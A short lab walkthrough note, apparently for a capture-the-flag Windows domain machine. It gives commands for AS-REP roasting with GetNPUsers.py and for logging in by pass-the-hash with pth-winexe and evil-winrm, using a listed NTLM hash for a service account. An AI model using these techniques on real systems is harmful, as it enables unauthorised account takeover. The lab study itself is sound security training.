Last updated 3 years ago
searchsploit -m 48431
When you get a possible user list, using the GetNPUsers.py to get the correct user list with the NTML hash. After that, using the command "pth-winexe","evil-winrm" will the NTML hash to log in to the windows system.
python3 GetNPUsers.py blackfield.local/ -usersfile profiles.txt -outputfile hash.txt -dc-ip 10.10.10.192 -format john
# Method 1 pth-winexe -U svc_backup%aad3b435b51404eeaad3b435b51404ee:b624dc83a27cc29da11d9bf25efea796 //10.10.10.192 cmd # Method 2 evil-winrm -U svc_backup -H aad3b435b51404eeaad3b435b51404ee:b624dc83a27cc29da11d9bf25efea796 -i 10.10.10.192
